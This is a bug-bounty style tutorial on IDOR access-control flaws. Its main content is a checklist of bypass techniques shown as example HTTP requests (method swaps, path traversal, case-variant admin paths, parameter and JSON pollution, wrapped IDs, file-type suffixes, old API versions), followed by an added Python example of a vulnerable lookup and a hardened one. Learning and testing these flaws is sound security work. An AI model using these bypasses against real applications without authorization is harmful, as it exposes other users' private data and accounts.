What is IDOR (along with IDOR Attack Method)


Errorfiathck

An IDOR (Insecure Direct Object Reference) vulnerability is an access control problem that occurs when a direct reference to an object (a file, a record of personal information, etc.) is controllable by the user and the application does not verify that the user is allowed to access that object.

Most often this type of vulnerability allows horizontal privilege escalation (access to the information of other users with the same rights) and, in rarer cases, vertical escalation of privileges.

The term IDOR became popular with its appearance in the OWASP Top 10 of 2007. However, it is just one example of the many access control implementation mistakes that allow access controls to be bypassed.

As an example, let's consider a SaaS application that includes invoice read and write functions, with predefined access levels and thus user rights.

Now imagine that the rights checks are misconfigured, allowing a user to access (read and/or write) the invoices of other application users simply by changing the URL.

The user can view one of their own invoices via the following URL:

https://www.example.com/invoices/002546

The user can then change the URL parameter, by hand or with the help of a tool. It should be noted that this kind of exploitation is very easy to automate with a brute-force tool when the identifiers are sequential, because of the speed of such tools and the simple configuration of the parameter; there is not much to explain.

Let's take the simplest case: changing the invoice ID:

https://www.example.com/invoices/002746

If an invoice with this ID actually exists in the database and the application returns it without performing any authorization check (we have not had to look for anything), then this is an IDOR. The impact of this type of vulnerability can be critical depending on the sensitivity of the data.

Basic steps:

1. Create two accounts if possible, or else enumerate users first.
2. Check whether the endpoint is private or public and whether it contains any kind of ID parameter.
3. Try changing the parameter value to another user's and see whether it does anything to their account.
4. Done!

Functions to check:

[ ] profile image
[ ] delete account
[ ] account information
[ ] view, delete and create api_key
[ ] read any comment
[ ] change price
[ ] change the currency from dollar to euro

[ ] Try to decode the ID if it is encoded using md5, base64, etc.

GET /GetUser/dmljdGltQG1haWwuY29t […]

[ ] change HTTP method

GET /users/delete/victim_id ->403

POST /users/delete/victim_id ->200

[ ] Try replacing parameter names

Instead of this:

GET /api/albums?album_id= <album id>

Try This:

GET /api/albums?account_id= <account id>

Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.

[ ] Path Traversal

POST /users/delete/victim_id ->403

POST /users/delete/my_id/..victim_id ->200

[ ] change request content-type

Content-Type: application/xml ->

Content-Type: application/json

[ ] swap non-numeric with numeric id

GET /file?id=90djbkdbkdbd29dd

GET /file?id=302

[ ] Missing Function Level Access Control (try case variants of the path)

GET /admin/profile ->401

GET /Admin/profile ->200

GET /ADMIN/profile ->200

GET /aDmin/profile ->200

GET /adMin/profile ->200

GET /admIn/profile ->200

GET /admiN/profile ->200

[ ] Send a wildcard instead of an ID

GET /api/users/user_id ->

GET /api/users/*

[ ] Never ignore encoded/hashed IDs

For hashed IDs, create multiple accounts and work out the pattern the application uses to allot an ID to a user.

[ ] Google Dorking / public forms

Search for all endpoints containing an ID that the search engine may already have indexed.

[ ] Brute-force hidden HTTP parameters

Use tools like Arjun or Param Miner.

[ ] Bypass object-level authorization: add the ID parameter to the endpoint if it is not present by default

GET /api_v1/messages ->200

GET /api_v1/messages?user_id=victim_uuid ->200

[ ] HTTP Parameter Pollution: give multiple values for the same parameter

GET /api_v1/messages?user_id=attacker_id&user_id=victim_id

GET /api_v1/messages?user_id=victim_id&user_id=attacker_id

[ ] change file type

GET /user_data/2341 -> 401

GET /user_data/2341.json -> 200

GET /user_data/2341.xml -> 200

GET /user_data/2341.config -> 200

GET /user_data/2341.txt -> 200

[ ] JSON parameter pollution

{"userid":1234,"userid":2542}

[ ] Wrap the ID with an array in the body

{"userid":123} ->401

{"userid":[123]} ->200

[ ] Wrap the ID with a JSON object

{"userid":123} ->401

{"userid":{"userid":123}} ->200

[ ] Test an outdated API version

GET /v3/users_data/1234 ->401

GET /v1/users_data/1234 ->200

[ ] If the website uses GraphQL, try to find IDOR through the GraphQL endpoint too

GET /graphql

[…]

GET /graphql.php?query=

[…]
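To show the server-side mistake behind the invoice example above and what a fix looks like, here is an added example (not code from the original post): the vulnerable lookup beside one that authorizes on the object's owner, rejects the array-wrapped, object-wrapped and polluted ID forms from the checklist, and canonicalizes the path before the function-level check so the case and file-type variants land on the same rule. The invoice data, account names and the framework-free handler functions are assumptions made for the example.

```python
from typing import Any, Optional, Tuple

# Constructed sample data (not from the post): invoice id -> owner and amount.
INVOICES = {
    "002546": {"owner": "alice", "amount": 120.0},
    "002746": {"owner": "bob", "amount": 980.0},
}


def get_invoice_vulnerable(current_user: str, invoice_id: str) -> Tuple[int, Optional[dict]]:
    """Looks the object up by the user-supplied id only: any logged-in user reads any invoice."""
    inv = INVOICES.get(invoice_id)
    return (404, None) if inv is None else (200, inv)


def parse_object_id(raw: Any) -> Optional[str]:
    """Accept only a plain digit string. Arrays, nested objects and polluted
    (list-valued) parameters are rejected instead of being coerced."""
    if not isinstance(raw, str) or not raw.isdigit():
        return None
    return raw


def get_invoice_hardened(current_user: str, raw_id: Any) -> Tuple[int, Optional[dict]]:
    invoice_id = parse_object_id(raw_id)
    if invoice_id is None:
        return 400, None
    inv = INVOICES.get(invoice_id)
    # Authorize on the object itself: the owner must be the caller. "Missing" and
    # "not yours" share the same 404 so the endpoint does not confirm which ids exist.
    if inv is None or inv["owner"] != current_user:
        return 404, None
    return 200, inv


def authorize_route(path: str, role: str) -> bool:
    """Apply the function-level rule to a canonical path, so /Admin/profile,
    /ADMIN/profile and /admin/profile.json hit the same check as /admin/profile."""
    canonical = path.split("?", 1)[0].lower()
    last_segment = canonical.rsplit("/", 1)[-1]
    if "." in last_segment:  # drop a format suffix such as .json/.xml/.txt
        canonical = canonical[: canonical.rfind(".")]
    if canonical == "/admin" or canonical.startswith("/admin/"):
        return role == "admin"
    return True
```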

Have a nice time.
